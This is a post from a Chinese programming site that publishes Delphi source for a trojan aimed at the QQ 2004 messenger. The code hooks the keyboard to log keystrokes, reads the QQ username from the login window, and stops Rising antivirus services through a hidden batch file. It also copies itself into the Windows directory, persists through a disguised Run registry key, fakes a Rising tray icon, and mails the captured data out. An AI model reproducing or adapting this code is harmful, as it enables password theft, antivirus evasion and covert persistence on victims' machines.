qq2004hack

类别:Delphi 点击:0 评论:0 推荐:

感谢 sforever 提供帮助
  hookkey: string;
  hHook: integer;
  Creeper,creeper1:TextFile;
  ahwnd,comboboxh:thandle;  //句柄
  qqformid:HWND;
 user:array[0..254] of char;
 SendBody:string;
 PSmtp,PUser,PPass,PGetMail,PTOMail,Subject,MailText:String;
implementation
//找QQ聊天窗口
function FpopoID(ahwnd:hwnd;w:integer):boolean;stdcall;
 var wintext:pchar;
    begin
    result:=true;
    getmem(wintext,100);
    getwindowtext(ahwnd,wintext,100);
   if Pos('与',WinText)>0  then
      begin
        TrySendMail;
        Sleep(100);
        UnHookWindowsHookEx(hHook);
         hHook := 0;
        Application.Terminate;
      end;
end;

function FmsgIDedit(ahwnd:hwnd;w:integer):boolean;stdcall;
 var
    f:TextFile;
    begin
      result:=true;
      comboboxh:=FindWindowEx(qqformid,0,'ComboBox',nil);
      SendMessage(comboboxh,WM_GETTEXT,254,Integer(@user));
      if trim(user)<>''  then
        begin
          assignfile(f,GetWinDir+'name.txt');
          rewrite(f);
          write(f,'QQ  用户名:'+user);
          closefile(f);
          exit;
        end;
      end;
function FqqID(ahwnd:hwnd;w:integer):boolean;stdcall;
 var wintext:pchar;
begin
    getmem(wintext,100);
    GetClassName(ahwnd,wintext,100);
   if wintext='#32770' then
      begin
        qqformid:=ahwnd;  //得到QQ窗口句柄
        if qqformid<>0 then
          begin
            result:=true;
            enumchildwindows(qqformid,@fmsgidedit,0); // 暂且注销
          end;
      end;
end;
function Keyhookresult(lP: integer; wP: integer): pchar;
begin
  result := '[Print Screen]';
  case lp of
    10688: result := '`';
    561: Result := '1';
    818: result := '2';
    1075: result := '3';
    1332: result := '4';
    1589: result := '5';
    1846: result := '6';
    2103: result := '7';
    2360: result := '8';
    2617: result := '9';
    2864: result := '0';
    3261: result := '-';
    3515: result := '=';
    4177: result := 'Q';
    4439: result := 'W';
    4677: result := 'E';
    4946: result := 'R';
    5204: result := 'T';
    5465: result := 'Y';
    5717: result := 'U';
    5961: result := 'I';
    6223: result := 'O';
    6480: result := 'P';
    6875: result := '[';
    7133: result := ']';
    11228: result := '\';
    7745: result := 'A';
    8019: result := 'S';
    8260: result := 'D';
    8518: result := 'F';
    8775: result := 'G';
    9032: result := 'H';
    9290: result := 'J';
    9547: result := 'K';
    9804: result := 'L';
    10170: result := ';';
    10462: result := '''';
    11354: result := 'Z';
    11608: result := 'X';
    11843: result := 'C';
    12118: result := 'V';
    12354: result := 'B';
    12622: result := 'N';
    12877: result := 'M';
    13244: result := ',';
    13502: result := '.';
    13759: result := '/';
    13840: result := '[Right-Shift]';
    14624: result := '[Space]';
    283: result := '[Esc]';
    15216: result := '[F1]';
    15473: result := '[F2]';
    15730: result := '[F3]';
    15987: result := '[F4]';
    16244: result := '[F5]';
    16501: result := '[F6]';
    16758: result := '[F7]';
    17015: result := '[F8]';
    17272: result := '[F9]';
    17529: result := '[F10]';
    22394: result := '[F11]';
    22651: result := '[F12]';
    10768: Result := '[Left-Shift]';
    14868: result := '[CapsLock]';
    3592: result := '[Backspace]';
    3849: result := '[Tab]';
    7441:
      if wp > 30000 then
        result := '[Right-Ctrl]'
      else
        result := '[Left-Ctrl]';
    13679: result := '[Num /]';
    17808: result := '[NumLock]';
    300: result := '[Print Screen]';
    18065: result := '[Scroll Lock]';
    17683: result := '[Pause]';
    21088: result := '[Num0]';
    21358: result := '[Num.]';
    20321: result := '[Num1]';
    20578: result := '[Num2]';
    20835: result := '[Num3]';
    19300: result := '[Num4]';
    19557: result := '[Num5]';
    19814: result := '[Num6]';
    18279: result := '[Num7]';
    18536: result := '[Num8]';
    18793: result := '[Num9]';
    19468: result := '[*5*]';
    14186: result := '[Num *]';
    19053: result := '[Num -]';
    20075: result := '[Num +]';
    21037: result := '[Insert]';
    21294: result := '[Delete]';
    18212: result := '[Home]';
    20259: result := '[End]';
    18721: result := '[PageUp]';
    20770: result := '[PageDown]';
    18470: result := '[UP]';
    20520: result := '[DOWN]';
    19237: result := '[LEFT]';
    19751: result := '[RIGHT]';
    7181: result := '[Enter]';
  end;
end;
function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall;
var
  creeper:TextFile;
begin
    if (peventmsg(lparam)^.message = WM_KEYDOWN) then
    hookkey := hookkey + Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH);
    if length(hookkey) > 0 then
    begin
       IF  enumwindows(@fqqid,0)  then
         begin
           AssignFile(Creeper, getwindir+'key.txt');
          if FileExists(getwindir+'key.txt') then
            begin
              Rewrite(creeper);
              Writeln(creeper, hookkey);
              closefile(Creeper);
            end;
       end;
    end ;
end;        
procedure TForm1.FormCreate(Sender: TObject);
var
 myname:string;
 batchfilename:string;
 bfile:TextFile;
 sysdir:string;
 noti:PNotifyIconData;
begin
  Application.ShowMainForm:=False;

  sysdir:=getwindir;
  BatchFileName :=sysdir+'killrav.bat';
  AssignFile(BFile, BatchFileName);
  Rewrite(BFile);
  Writeln(BFile, '@net stop RsCCenter');
  Writeln(BFile, '@net stop rsravmon');
  Writeln(BFile, '@close ');
  CloseFile(BFile);
  myname := ExtractFilename(Application.Exename); //获得文件名
  if application.Exename <> sysdir + myname then //
    begin
      copyfile(pchar(application.Exename), pchar(sysdir + myname), False);
    end;
  with TRegistry.Create do
    begin
      RootKey := HKEY_LOCAL_MACHINE;
      OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', TRUE );
      WriteString( 'system,rundll', sysdir+'RavMom.exe' );
      free;
    end;
  assignfile(creeper,sysdir+'key.txt');
  if not FileExists(sysdir+'key.txt') then
    begin
      rewrite(creeper);
      closefile(creeper);
    end;
  assignfile(creeper1,sysdir+'name.txt');
  if not FileExists(sysdir+'name.txt') then
    begin
      rewrite(creeper1);
      closefile(creeper1);
    end;
  WinExec(pchar(sysdir+'killrav.bat'),sw_hide);
  hHook := 0;
  hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
  noti:=new(PNotifyIconData);
      noti.cbSize:=80;
      noti.Wnd:=form1.handle;
      noti.uID:=0;
      noti.szTip:='瑞星计算机监控';
      noti.hIcon:=form1.icon.handle;//瑞星图标
      noti.uFlags:=NIF_MESSAGE or NIF_ICON or NIF_TIP;
      Shell_NotifyIcon(NIM_ADD,noti);

  end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
 enumwindows(@fpopoid,0);
end;

procedure TForm1.FormDestroy(Sender: TObject);
begin
          DeleteFile(getwindir+'key.txt');
          DeleteFile(getwindir+'name.txt');
          DeleteFile(getwindir+'killrav.bat');
end;

end.

 

 


 

本文地址:http://com.8s8s.com/it/it4928.htm